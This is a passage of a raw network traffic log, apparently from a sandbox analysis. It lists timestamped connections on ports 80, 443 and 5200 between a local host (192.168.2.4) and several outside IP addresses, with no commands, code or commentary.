Dec 9, 2024 08:08:57.107841015 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.107887983 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.109478951 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.109498024 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.109519958 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.109529972 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.110187054 CET	49888	5200	192.168.2.4	185.157.162.216
Dec 9, 2024 08:08:57.111238956 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.111251116 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.111300945 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.112081051 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.112871885 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.113048077 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.113099098 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.113909006 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.113956928 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.113960981 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.113976955 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.114029884 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.114034891 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.114075899 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.114075899 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.114662886 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.114708900 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.115365982 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.115377903 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.115408897 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.115422010 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.116951942 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.116971970 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.116991997 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.117106915 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.118590117 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.118613958 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.118626118 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.118659019 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.118688107 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.119450092 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.119498014 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.120284081 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.120327950 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.121071100 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.121117115 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.121993065 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.122004986 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.122037888 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.123564005 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.123577118 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.123615980 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.124469995 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.124488115 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.124530077 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.124536037 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.124579906 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.124579906 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.125240088 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.125253916 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.125292063 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.125303030 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.126120090 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.126162052 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.130264997 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.130280972 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.130338907 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.130345106 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.130402088 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.136044979 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.136060953 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.136126041 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.136131048 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.136168003 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.136310101 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.141015053 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.141030073 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.141091108 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.141097069 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.141140938 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.173798084 CET	49911	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:57.174084902 CET	49921	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:57.213963032 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.214036942 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.214140892 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.214241982 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.214517117 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.214553118 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.214889050 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.214927912 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.215006113 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.215179920 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.215394974 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.215652943 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.215754032 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.215878963 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.216130972 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.216178894 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.216490030 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.216535091 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.216877937 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.216922998 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.217286110 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.217329025 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.217623949 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.217664957 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.218147039 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.218204021 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.218372107 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.218410969 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.218943119 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.218982935 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.219191074 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.219229937 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.219759941 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.219814062 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.219975948 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.220016003 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.220588923 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.220902920 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.220951080 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.221396923 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.221438885 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.221596956 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.221735954 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.222279072 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.222316027 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.222466946 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.222516060 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.223010063 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.223063946 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.223215103 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.223254919 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.223846912 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.224042892 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.224092007 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.224734068 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.224786043 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.224860907 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.224900961 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.225486994 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.225529909 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.225702047 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.225755930 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.255671024 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.255851030 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.255918026 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.256182909 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.256434917 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.276875019 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.276894093 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.276977062 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.276977062 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.276988029 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.277076960 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.282361031 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.282376051 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.282452106 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.282458067 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.282501936 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.288542986 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.288559914 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.288609982 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.288615942 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.288655043 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.293421030 CET	80	49911	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:57.293431997 CET	80	49921	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:57.293466091 CET	49911	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:57.293545961 CET	49921	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:57.294259071 CET	49921	80	192.168.2.4	185.215.113.43
Dec 9, 2024 08:08:57.294492006 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.294512033 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.294554949 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.294560909 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.294595003 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.294595003 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.300484896 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.300504923 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.300543070 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.300549030 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.300568104 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.300616980 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.306431055 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.306456089 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.306515932 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.306515932 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.306525946 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.306570053 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.312690973 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.312710047 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.312814951 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.312822104 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.312869072 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.318073988 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.318094015 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.318156004 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.318161964 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.318183899 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.318214893 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.338907003 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.338963985 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.339104891 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.339548111 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.339596987 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.339852095 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.339891911 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.340306997 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.340656042 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.340701103 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.340955019 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.341356039 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.341402054 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.341733932 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.341775894 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.342108011 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.342464924 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.342603922 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.342639923 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.342875957 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.342911005 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.343403101 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.343452930 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.343569994 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.343617916 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.344194889 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.344480991 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.344547987 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.345006943 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.345350981 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.345397949 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.345853090 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.345899105 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.346079111 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.346611023 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.346735001 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.346818924 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.346919060 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.346971989 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.347460985 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.347537994 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.347775936 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.348112106 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.348259926 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.348309040 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.348474026 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.349132061 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.349178076 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.349319935 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.349946022 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.349997044 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.350126028 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.350168943 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.350724936 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.350761890 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.350924015 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.350954056 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.351561069 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.351708889 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.351756096 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.356005907 CET	5200	49917	185.157.162.216	192.168.2.4
Dec 9, 2024 08:08:57.358556032 CET	49917	5200	192.168.2.4	185.157.162.216
Dec 9, 2024 08:08:57.381007910 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.381170988 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.381355047 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.381365061 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.381412983 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.381412983 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.388076067 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.388088942 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.388151884 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.388160944 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.388290882 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.413501024 CET	80	49921	185.215.113.43	192.168.2.4
Dec 9, 2024 08:08:57.464169979 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.464349985 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.464729071 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.465162992 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.465198994 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.465446949 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.465837955 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.465864897 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.466180086 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.466428995 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.466456890 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.466804028 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.468091965 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.468135118 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.468844891 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.469144106 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.469156981 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.469171047 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.469707012 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.470619917 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.470639944 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.470700979 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.472285032 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.472304106 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.473992109 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.474004984 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.474802971 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.474833965 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.475590944 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.476090908 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.476449013 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.476499081 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.476514101 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.476583958 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.476625919 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.476633072 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.477256060 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.477300882 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.477310896 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.478132010 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.478151083 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.479762077 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.479773998 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.479789972 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.480092049 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.481427908 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.481441021 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.482223034 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.482249975 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.483089924 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.483119011 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.483408928 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.483967066 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.484090090 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.484715939 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.484827042 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.485522032 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.485539913 CET	80	49880	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:57.485591888 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.485591888 CET	49880	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:57.486409903 CET	5200	49917	185.157.162.216	192.168.2.4
Dec 9, 2024 08:08:57.486455917 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.486471891 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.488096952 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.488101959 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.488785028 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.491430998 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.491446018 CET	443	49879	154.216.20.243	192.168.2.4
Dec 9, 2024 08:08:57.491532087 CET	49879	443	192.168.2.4	154.216.20.243
Dec 9, 2024 08:08:57.491538048 CET	443	49879	154.216.20.243	192.168.2.4
